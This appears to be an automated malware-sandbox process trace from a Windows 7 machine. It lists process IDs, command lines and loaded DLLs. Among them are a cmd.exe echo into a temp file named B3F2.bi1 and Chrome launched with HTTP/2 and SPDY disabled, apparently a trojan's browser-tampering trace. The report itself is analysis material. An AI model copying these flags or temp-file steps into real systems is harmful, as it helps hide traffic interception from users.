c:\windows\system32\fwpuclnt.dll

PID
2208
CMD
cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\B3F2.bi1"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
explorer.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
4068
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --use-spdy=off --disable-http2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
explorer.exe
User
admin
Integrity Level
MEDIUM
Exit code
3221225547
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\hid.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winusb.dll
c:\windows\system32\msi.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mscms.dll
c:\windows\system32\winsta.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wpc.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\samlib.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\imagehlp.dll

PID
2816
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x118,0x11c,0x120,0x114,0x124,0x6de30f18,0x6de30f28,0x6de30f34 --use-spdy=off --disable-http2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll

PID
4016
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4092 --on-initialized-event-handle=444 --parent-handle=448 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_watcher.dll

PID
3252
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=5578522844380413194 --mojo-platform-channel-handle=1044 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\73.0.3683.75\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\73.0.3683.75\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\73.0.3683.75\swiftshader\libegl.dll

PID
3564
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --disable-http2 --service-request-channel-token=16725365708019442138 --mojo-platform-channel-handle=1576 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll

PID
4000
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --service-pipe-token=3139370358963957829 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3139370358963957829 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2160 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2512
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --service-pipe-token=4112620172238307887 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4112620172238307887 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2072 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2624
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --service-pipe-token=16533420111127541042 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16533420111127541042 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3980
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=3017072763453789337 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3017072763453789337 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2268
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --disable-http2 --service-request-channel-token=8076628409483783557 --mojo-platform-channel-handle=3484 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3016
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --disable-http2 --service-request-channel-token=6596028496301311240 --mojo-platform-channel-handle=3588 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3264
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --disable-http2 --service-request-channel-token=14270071528981743817 --mojo-platform-channel-handle=3460 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
